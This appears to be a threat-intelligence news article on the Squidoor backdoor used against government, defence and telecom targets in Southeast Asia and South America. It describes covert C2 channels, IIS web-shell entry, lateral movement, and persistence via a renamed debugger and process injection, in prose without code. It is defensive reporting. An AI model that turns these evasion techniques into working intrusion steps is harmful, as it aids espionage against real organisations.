A highly sophisticated malware known as “Squidoor” has surfaced, targeting key sectors such as government, defense, telecommunications, education, and aviation in Southeast Asia and South America. Believed to be the work of a Chinese threat actor operating under the activity cluster CL-STA-0049, Squidoor has been designed to infiltrate networks, maintain persistence, and extract sensitive data using advanced techniques.
This modular backdoor is specifically crafted for stealth and adaptability, making it a potent tool for cyber espionage. One of the standout features of Squidoor is its utilization of multi-protocol command-and-control (C2) techniques. By employing various covert communication methods like Outlook API, DNS tunneling, and ICMP tunneling, Squidoor can interact with its C2 servers seamlessly. The flexibility of this malware is evident with the Windows variant supporting ten different C2 communication methods, while the Linux version offers nine options. These methods include HTTP-based communication, reverse TCP/UDP connections, named pipes for internal communication, and even posing as an Outlook mail client using the Microsoft Graph API. The use of the Outlook API for communication adds an extra layer of complexity, making it harder to detect malicious activities amidst legitimate network traffic.
Furthermore, Squidoor gains initial access by exploiting vulnerabilities in Internet Information Services (IIS) servers and deploying web shells such as OutlookDC.aspx and TimeoutAPI.aspx. These web shells act as persistent gateways for executing commands on compromised systems. The malware then spreads laterally within networks using tools like curl and Impacket, often disguising payloads as genuine files to avoid detection.
Persistence is a key aspect of Squidoor’s operation, achieved through Living-Off-the-Land Binary-and-Script (LOLBAS) techniques. By using Microsoft’s Console Debugger (cdb.exe) renamed as fontdrvhost.exe, Squidoor can load shellcode directly into memory, bypassing traditional antivirus detection. Scheduled tasks are utilized to execute Squidoor’s payloads upon system startup, ensuring continued access and operation within the compromised network.
The modular architecture of Squidoor allows for a wide range of capabilities, including host reconnaissance, arbitrary command execution, file exfiltration, payload delivery, and lateral communication between infected endpoints. The malware also supports code injection into processes like mspaint.exe or conhost.exe to evade security tools effectively. Additional modules enable attackers to execute PowerShell scripts without invoking the PowerShell binary or carry out pass-the-hash attacks.
In conclusion, Squidoor marks a significant advancement in malware sophistication by blending stealthy communication channels with modular functionality to target high-value organizations. Its ability to operate on multiple platforms and mimic legitimate network traffic underscores the escalating threat posed by state-sponsored cyber actors. Security professionals are advised to enhance their detection capabilities and utilize advanced threat prevention tools to counteract such threats effectively.
As cyber threats continue to evolve, staying informed about the latest malware and phishing attacks is crucial. Tools like ANY.RUN TI Lookup provide valuable threat intelligence to help organizations identify and respond to emerging cyber threats. By staying vigilant and proactive, businesses can enhance their cybersecurity posture and protect their digital assets from malicious actors.